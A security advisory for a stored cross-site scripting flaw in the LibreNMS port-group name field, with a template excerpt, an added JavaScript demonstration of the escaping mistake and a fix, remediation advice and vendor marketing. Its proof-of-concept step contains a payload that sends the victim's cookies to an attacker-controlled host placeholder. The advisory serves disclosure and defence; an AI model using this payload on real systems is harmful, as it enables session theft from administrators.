CVE-2026-26992

CVE-2026-26992 is a medium-severity cross-site scripting (XSS) vulnerability in librenms/librenms (composer), affecting versions < 26.2.0. It is fixed in 26.2.0.

Summary

/port-groups name Stored Cross-Site Scripting

  • HTTP POST
  • Request-URI(s): "/port-groups"
  • Vulnerable parameter(s): "name"
  • Attacker must be authenticated with "admin" privileges.
  • When a user adds a port group, an HTTP POST request is sent to the Request-URI "/port-groups". The name of the newly created port group is stored in the value of the name parameter.
  • After the port group is created, the entry is displayed along with some relevant buttons like Edit and Delete.

Details

The vulnerability exists because the name of the port group is not sanitized of HTML/JavaScript-related characters or strings before it is placed inside the Delete button's onclick handler. The page is rendered by the following template:

resources/views/port-group/index.blade.php:

@extends('layouts.librenmsv1')
@section('title', __('Port Groups'))
@section('content')
<div class="container-fluid">
<x-panel id="manage-port-groups-panel">
{{-- [...Truncated...] --}}
@foreach($port_groups as $port_group)
{{-- [...Truncated...] --}}

<button type="button" class="btn btn-danger btn-sm" title="{{ __('delete Port Group') }}" aria-label="{{ __('Delete') }}"
        onclick="delete_pg(this, '{{ $port_group->name }}', '{{ route('port-groups.destroy', $port_group->id) }}')">
{{-- the port group's name is used in the Delete button's onclick handler without sanitizing for XSS-related characters/strings --}}

As the port group's name is not sanitized of HTML/JavaScript-related characters or strings, this results in stored cross-site scripting.
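To show why HTML-escaping does not protect a value that lands inside an onclick JavaScript string, and what a context-appropriate rendering looks like, here is an added JavaScript example. It is not LibreNMS code and not the project's actual fix. It models Blade's {{ }} output as htmlspecialchars with ENT_QUOTES (Laravel's e() helper) and the browser's decoding of character references in attribute values before the handler is compiled: an encoded quote is decoded back to a quote and still terminates the string literal. The hardened variant, which moves the name into a data- attribute and reads it back via this.dataset, is one possible remediation assumed here for illustration; delete_pg, the /port-groups/7 URL and the probe string are constructed placeholders.

```javascript
// Added example (not LibreNMS code). Shows why HTML-escaping a value that is
// interpolated into an onclick JavaScript string does not prevent XSS, and a
// rendering that keeps user data out of the script context entirely.

// Equivalent of Laravel's e() helper: htmlspecialchars with ENT_QUOTES.
function htmlEscape(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// What the browser does to an attribute value before an event handler is
// compiled: character references are decoded. Only the five references above
// are handled, which is enough for this demonstration.
function decodeAttributeValue(value) {
  return value
    .replace(/&#039;/g, "'")
    .replace(/&quot;/g, '"')
    .replace(/&lt;/g, '<')
    .replace(/&gt;/g, '>')
    .replace(/&amp;/g, '&');
}

// Vulnerable pattern, mirroring the template on the page: the escaped name is
// interpolated into a JavaScript string literal inside onclick.
function renderDeleteButtonVulnerable(name, destroyUrl) {
  return '<button type="button" onclick="delete_pg(this, \'' + htmlEscape(name) +
    '\', \'' + htmlEscape(destroyUrl) + '\')">Delete</button>';
}

// Hardened pattern (assumed fix, for illustration): the name stays in an HTML
// attribute, where HTML-escaping is the right encoding, and the handler reads
// it back from the DOM instead of embedding it in script.
function renderDeleteButtonHardened(name, destroyUrl) {
  return '<button type="button" data-name="' + htmlEscape(name) +
    '" data-url="' + htmlEscape(destroyUrl) +
    '" onclick="delete_pg(this, this.dataset.name, this.dataset.url)">Delete</button>';
}

// Return a decoded attribute value from a rendered element, as the DOM would.
function attributeValue(html, attr) {
  const m = html.match(new RegExp(attr + '="([^"]*)"'));
  return m ? decodeAttributeValue(m[1]) : null;
}

// Blank out the contents of JavaScript string literals (honouring backslash
// escapes) so only executable code remains. Any attacker-controlled text that
// survives this is running as script, not sitting inside a string.
function codeOutsideStrings(js) {
  let out = '';
  let i = 0;
  while (i < js.length) {
    const c = js[i];
    if (c === "'" || c === '"') {
      let j = i + 1;
      while (j < js.length && js[j] !== c) {
        if (js[j] === '\\') j++;
        j++;
      }
      out += c + c; // keep an empty literal as a placeholder
      i = j + 1;
    } else {
      out += c;
      i++;
    }
  }
  return out;
}

// The code a browser would actually execute for a given rendering of `name`.
function executableHandlerCode(renderFn, name) {
  const handler = attributeValue(renderFn(name, '/port-groups/7'), 'onclick');
  return codeOutsideStrings(handler);
}

// Constructed probe with the same shape as the PoC on the page: close the
// string literal, run a marker statement, then re-open a delete_pg call so the
// handler still parses.
const PROBE = "12345'); alert(1); delete_pg(this, '12345";

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable:', executableHandlerCode(renderDeleteButtonVulnerable, PROBE));
  console.log('hardened  :', executableHandlerCode(renderDeleteButtonHardened, PROBE));
}
```

The check in executableHandlerCode is the useful part for a reviewer: with the vulnerable template the marker call appears in the code outside any string literal, while the hardened template leaves the handler body fixed regardless of the name, and the name round-trips intact through data-name.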

PoC

  • Login
  • Select Ports > Manage Port Groups
  • Select New Port Group
  • Input 12345');var pt=new Image();pt.src='http://<ATTACKER_IP>/cookiePG'.concat(document.cookie);document.body.appendChild(pt);delete_pg(this, '12345 into the "Name" input box (change <ATTACKER_IP> to the IP of an attacker-controlled web server)
  • Select Save
  • Select the Delete Icon for the newly created Port Group
  • Select OK
  • The JavaScript payload is not sanitized, and an HTTP request will be sent to the attacker-controlled server, leaking the user's cookies.

Impact

Untrusted input is rendered as active markup in a victim's browser, which can run script in their session. Typical impact: session or credential theft, and actions taken as the user.

Affected versions

librenms/librenms (< 26.2.0)

Security releases

librenms/librenms → 26.2.0 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Upgrade librenms/librenms to 26.2.0 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-26992? CVE-2026-26992 is a medium-severity cross-site scripting (XSS) vulnerability in librenms/librenms (composer), affecting versions < 26.2.0. It is fixed in 26.2.0. Untrusted input is rendered as active markup in a victim's browser, which can run script in their session.
  2. Which versions of librenms/librenms are affected by CVE-2026-26992? librenms/librenms (composer) versions < 26.2.0 are affected.
  3. Is there a fix for CVE-2026-26992? Yes. CVE-2026-26992 is fixed in 26.2.0. Upgrade to this version or later.
  4. Is CVE-2026-26992 exploitable, and should I be worried? Whether CVE-2026-26992 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  5. What actually determines whether CVE-2026-26992 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-26992? Upgrade librenms/librenms to 26.2.0 or later.

Other vulnerabilities in librenms/librenms

  • CVE-2026-6204
  • CVE-2026-26990
  • CVE-2026-26989
  • CVE-2026-26988
  • CVE-2026-27016
